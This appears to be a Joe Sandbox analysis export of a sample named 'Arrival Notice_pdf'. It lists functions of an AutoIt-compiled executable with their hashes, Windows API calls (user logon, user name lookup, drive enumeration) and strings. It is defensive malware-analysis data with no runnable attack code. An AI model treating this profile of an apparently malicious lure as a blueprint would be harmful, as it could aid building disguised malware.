Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 8363edd6de3aa32583afe137acd4d3c610b18fa29e60f33cf2833656677900cb
Instruction ID: 141a0faeb266f3c862acf4ecd38595d386a42391a017b96be6c28b2c091ddefe
Opcode Fuzzy Hash: 8363edd6de3aa32583afe137acd4d3c610b18fa29e60f33cf2833656677900cb
Instruction Fuzzy Hash: E1D017A817E20628E8682B249C0FE760D28B3017C0FA08189B082890C2A8D0E8619232

Function 0027B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0027AD3E), ref: 0027B124

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: ebb740fffc5db8d20bf3a27029ec5624b4e4cc4bac7d46aa23cfa600605441c3
Instruction ID: d884b9bd469faf83ad013e899c1bda4efb27956526b9d8eaa748f008aaad7731
Opcode Fuzzy Hash: ebb740fffc5db8d20bf3a27029ec5624b4e4cc4bac7d46aa23cfa600605441c3
Instruction Fuzzy Hash: 1BD09E321A465EAEDF025FA4EC06EAE3F6AEB04701F448511FA15D50A1C675D532AB50

Function 002BB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 002BB352

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 16d5b0671541e3fa8b54daa301960ebbe99d440867b7280a42609b173d27b292
Instruction ID: 19b45694cd15cfd039486531fcf8b29a5c9647453c86c1e08c193aa2574387db
Opcode Fuzzy Hash: 16d5b0671541e3fa8b54daa301960ebbe99d440867b7280a42609b173d27b292
Instruction Fuzzy Hash: FDC04CB1410109DFC751CBC4DD48EEEBBBCAB04301F1040929105F1110D7709B459B72

Function 00268189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0026818F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 09415af996504b2dbfdafed29e9d30650c3dfdafe63580658a39838d3ae4ce9e
Instruction ID: ac3de913e0d6ff99694f95fec532859902a1fd31e30528b4b32a9f05b1591fbb
Opcode Fuzzy Hash: 09415af996504b2dbfdafed29e9d30650c3dfdafe63580658a39838d3ae4ce9e
Instruction Fuzzy Hash: D5A0113008020CAB8F002B82FC088883F2CEA002A0B0000A2F80C020208B22A8208A82

Function 0024E3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04953b3fa9a6eebb1252ad9c40c4a8063196d1769dbebb68b1a4389a7bd37d39
Instruction ID: 75ef93cc850a9d0599fbf8bf9e675815b8ce1820af3a4a37af14a8d867eb732b
Opcode Fuzzy Hash: 04953b3fa9a6eebb1252ad9c40c4a8063196d1769dbebb68b1a4389a7bd37d39
Instruction Fuzzy Hash: 3B22CD70924206CFEF28DF58C480AAEF7B0FF58314F168069E9569B351E371ADA5CB91

Function 002493F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a508d00bcb531bf939d6da962dc0860e9d17800da435405e3f591c1eed8f1b7c
Instruction ID: 33e7b0930037a582813d634757e1bc83f3f4b169bb9351eb4dfd4098e42177e2
Opcode Fuzzy Hash: a508d00bcb531bf939d6da962dc0860e9d17800da435405e3f591c1eed8f1b7c
Instruction Fuzzy Hash: EB12AE70A20609DFDF08DFA4D985AEEB7F9FF48300F204569E806E7254EB35A964CB54

Function 0024AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: e1ee1b8c9c29fd3a8a65508db02b604d27c5345206abe5ddff3025416158491c
Instruction ID: 5e1573f621a473927c5b612c2160ba6e303b8f79d1177967bbf05f9159e01934
Opcode Fuzzy Hash: e1ee1b8c9c29fd3a8a65508db02b604d27c5345206abe5ddff3025416158491c
Instruction Fuzzy Hash: B402D570A20205DFDF19DF68D9816AEB7B5FF48340F148069E80ADB255EB31DA29CB91

Function 002602A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: a0d491ddb5ea04d39c3460afcbf030f1830735b797dcbc91fbc40da3c210c556
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 3FC1D7322251930ADF6D4A39C5B543FFAA15E917B231A076DD8B3CB5D2EF20C578E620

Function 002606D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: a014f8805d38a3be840aff2a638d41b05f6ed835575dd8d4c15885f8b69d8e0e
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: CBC1C73222519309DF6D4A39C57543FFAA15E92BB231A076DD8B3CB4D6EF20C578E620

Function 0025FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 05a33a57a358d0097f67c4ad0be757c1a12a1a76fe5293954460c5dfeb880361
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: DAC1C33222509309DF9D4A39D63543EBAA15AA27B731A077DDCB2CB4D6EF30C538D624

Function 0029A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0029A2FE
DeleteObject.GDI32(00000000), ref: 0029A310
DestroyWindow.USER32 ref: 0029A31E
GetDesktopWindow.USER32 ref: 0029A338
GetWindowRect.USER32(00000000), ref: 0029A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0029A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0029A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A4D8
GetClientRect.USER32(00000000,?), ref: 0029A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0029A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A55E
GlobalLock.KERNEL32(00000000), ref: 0029A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A576
GlobalUnlock.KERNEL32(00000000), ref: 0029A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A586
GlobalFree.KERNEL32(00000000), ref: 0029A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,002CD9BC,00000000), ref: 0029A5B9
GlobalFree.KERNEL32(00000000), ref: 0029A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0029A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0029A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0029A81D

Strings

DISPLAY, xrefs: 0029A680
static, xrefs: 0029A518, 0029A66F
AutoIt v3, xrefs: 0029A4D0
, xrefs: 0029A7A3

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 0310fd9858cbe3abac817919036ea21f43ad4bc861d48d23f020c55256e8ca94
Instruction ID: 0f8471218e2d70922ffa3795e3e735e405087c90e239f72d82748a933ba75c5f
Opcode Fuzzy Hash: 0310fd9858cbe3abac817919036ea21f43ad4bc861d48d23f020c55256e8ca94
Instruction Fuzzy Hash: CC027C71910205EFDB14DFA8DD89EAEBBB9FB48310F148159F905AB2A1C770AD51CFA0

Function 002AD285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 002AD2DB
GetSysColorBrush.USER32(0000000F), ref: 002AD30C
GetSysColor.USER32(0000000F), ref: 002AD318
SetBkColor.GDI32(?,000000FF), ref: 002AD332
SelectObject.GDI32(?,00000000), ref: 002AD341
InflateRect.USER32(?,000000FF,000000FF), ref: 002AD36C
GetSysColor.USER32(00000010), ref: 002AD374
CreateSolidBrush.GDI32(00000000), ref: 002AD37B
FrameRect.USER32(?,?,00000000), ref: 002AD38A
DeleteObject.GDI32(00000000), ref: 002AD391
InflateRect.USER32(?,000000FE,000000FE), ref: 002AD3DC
FillRect.USER32(?,?,00000000), ref: 002AD40E
GetWindowLongW.USER32(?,000000F0), ref: 002AD439

Part of subcall function 002AD575: GetSysColor.USER32(00000012), ref: 002AD5AE
Part of subcall function 002AD575: SetTextColor.GDI32(?,?), ref: 002AD5B2
Part of subcall function 002AD575: GetSysColorBrush.USER32(0000000F), ref: 002AD5C8
Part of subcall function 002AD575: GetSysColor.USER32(0000000F), ref: 002AD5D3
Part of subcall function 002AD575: GetSysColor.USER32(00000011), ref: 002AD5F0
Part of subcall function 002AD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002AD5FE
Part of subcall function 002AD575: SelectObject.GDI32(?,00000000), ref: 002AD60F
Part of subcall function 002AD575: SetBkColor.GDI32(?,00000000), ref: 002AD618
Part of subcall function 002AD575: SelectObject.GDI32(?,?), ref: 002AD625
Part of subcall function 002AD575: InflateRect.USER32(?,000000FF,000000FF), ref: 002AD644
Part of subcall function 002AD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002AD65B
Part of subcall function 002AD575: GetWindowLongW.USER32(00000000,000000F0), ref: 002AD670
Part of subcall function 002AD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002AD698

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 2bd5d8e2bdea27c11004a0e5e8b71452b173d76ade5a5b388a1da630ab1dc36e
Instruction ID: 5c6e4224f304b6199c2e79c18415acf4f0aa7f55759bbd0d0edeb1ca6b71f863
Opcode Fuzzy Hash: 2bd5d8e2bdea27c11004a0e5e8b71452b173d76ade5a5b388a1da630ab1dc36e
Instruction Fuzzy Hash: 13917171408301BFDB109F64EC08E5BBBA9FF89325F500A29F966961A0DB71E954CF92

Function 0025B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0025B98B
DeleteObject.GDI32(00000000), ref: 0025B9CD
DeleteObject.GDI32(00000000), ref: 0025B9D8
DestroyIcon.USER32(00000000), ref: 0025B9E3
DestroyWindow.USER32(00000000), ref: 0025B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 002BD2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002BD2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 002BD711

Part of subcall function 0025B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0025B759,?,00000000,?,?,?,?,0025B72B,00000000,?), ref: 0025BA58

SendMessageW.USER32 ref: 002BD758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002BD76F
ImageList_Destroy.COMCTL32(00000000), ref: 002BD785
ImageList_Destroy.COMCTL32(00000000), ref: 002BD790

Strings

0, xrefs: 002BD5A5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 8185c156567c3baeef729c46228eb6b0b2132de93093826e92b7219e8bffada7
Instruction ID: 91a3e0b48db5e47959b6f487fe32bd54221d6bb0282b5b52c3ecc1af27a9db3d
Opcode Fuzzy Hash: 8185c156567c3baeef729c46228eb6b0b2132de93093826e92b7219e8bffada7
Instruction Fuzzy Hash: 96129C30124202DFDB21CF28D888BE9BBE4BF45355F184569F989CB252DB31E865CF91

Function 0028DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0028DBD6
GetDriveTypeW.KERNEL32(?,002DDC54,?,\\.\,002DDC00), ref: 0028DCC3
SetErrorMode.KERNEL32(00000000,002DDC54,?,\\.\,002DDC00), ref: 0028DE29

Strings

Removable, xrefs: 0028DD15
1394, xrefs: 0028DDA8
ATA, xrefs: 0028DDA1
ATAPI, xrefs: 0028DD9A
RAID, xrefs: 0028DDC4
SSD, xrefs: 0028DD50
Fixed, xrefs: 0028DD0B
CDROM, xrefs: 0028DCF7
SAS, xrefs: 0028DDD2
SSA, xrefs: 0028DDAF
SATA, xrefs: 0028DDD9
Network, xrefs: 0028DD01
MMC, xrefs: 0028DDE7
FileBackedVirtual, xrefs: 0028DDF5
RAMDisk, xrefs: 0028DCED
iSCSI, xrefs: 0028DDCB
\\.\, xrefs: 0028DC2B
SCSI, xrefs: 0028DD93
Fibre, xrefs: 0028DDB6
Virtual, xrefs: 0028DDEE
Unknown, xrefs: 0028DCE3, 0028DD8C
USB, xrefs: 0028DDBD
PhysicalDrive, xrefs: 0028DC67

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 2a79185030393c1e09b825c39e2db6da25e5abb6c08460c12cb1742e9ba8d822
Instruction ID: 6f1245070f7562a7e449bb962b5eb660cbd119740e0343c0208d5940b8f11dd4
Opcode Fuzzy Hash: 2a79185030393c1e09b825c39e2db6da25e5abb6c08460c12cb1742e9ba8d822
Instruction Fuzzy Hash: 0951D13927A306AB8714FF15C891839F7A0FB96784F20482AF507976D1DBA0D979CB42

Function 0024CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0024CC68
__wcsnicmp.LIBCMT ref: 0024CC80
__wcsnicmp.LIBCMT ref: 0024CC98
__wcsnicmp.LIBCMT ref: 0024CCB0
__wcsnicmp.LIBCMT ref: 0024CCC8
__wcsnicmp.LIBCMT ref: 0024CCE0
__wcsnicmp.LIBCMT ref: 0024CCF8
__wcsnicmp.LIBCMT ref: 0024CD0C
__wcsnicmp.LIBCMT ref: 0024CD4D
__wcsnicmp.LIBCMT ref: 0024CD61
__wcsnicmp.LIBCMT ref: 0024CD75
__wcsnicmp.LIBCMT ref: 0024CD89

Strings

#comments-start, xrefs: 0024CCF2, 0024CD47
#OnAutoItStartRegister, xrefs: 0024CCAA
#include, xrefs: 0024CCDA
Cannot parse #include, xrefs: 002B2FA1
Unterminated group of comments, xrefs: 002B2FB4
#requireadmin, xrefs: 0024CC92
#comments-end, xrefs: 0024CD6F
#pragma compile, xrefs: 0024CC62
#ce, xrefs: 0024CD83
#include-once, xrefs: 0024CCC2
Bad directive syntax error, xrefs: 002B2ECB
#notrayicon, xrefs: 0024CC7A
#cs, xrefs: 0024CD06, 0024CD5B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: fdde8c996944559b55fac14e112aa32ee970ecf2f63c5cf8a422e7115a0afc4f
Instruction ID: 0ba5e246d655cd8eb8f7729e6146e79a7d5fb130d3dd9657d788213c8a375de8
Opcode Fuzzy Hash: fdde8c996944559b55fac14e112aa32ee970ecf2f63c5cf8a422e7115a0afc4f
Instruction Fuzzy Hash: 49816930671306FADB68AE68CC82FBB3769EF15340F144025F905AB1C6EB70E975CA90

Function 002A638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,002DDC00), ref: 002A6449

Strings

SENDCOMMANDID, xrefs: 002A67CA
FINDSTRING, xrefs: 002A6596
UNCHECK, xrefs: 002A66A1
DELSTRING, xrefs: 002A6569
SETCURRENTSELECTION, xrefs: 002A65D6
SHOWDROPDOWN, xrefs: 002A6500
HIDEDROPDOWN, xrefs: 002A6520
CHECK, xrefs: 002A668B
EDITPASTE, xrefs: 002A675B
ISCHECKED, xrefs: 002A6659
SELECTSTRING, xrefs: 002A6626
GETLINE, xrefs: 002A678B
GETLINECOUNT, xrefs: 002A66E4
GETCURRENTCOL, xrefs: 002A6724
TABLEFT, xrefs: 002A64A7
GETCURRENTSELECTION, xrefs: 002A6603
ISENABLED, xrefs: 002A648C
TABRIGHT, xrefs: 002A64BD
ADDSTRING, xrefs: 002A6536
CURRENTTAB, xrefs: 002A64DD
ISVISIBLE, xrefs: 002A6455
GETCURRENTLINE, xrefs: 002A6704
GETSELECTED, xrefs: 002A66C1

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: BuffCharUpper
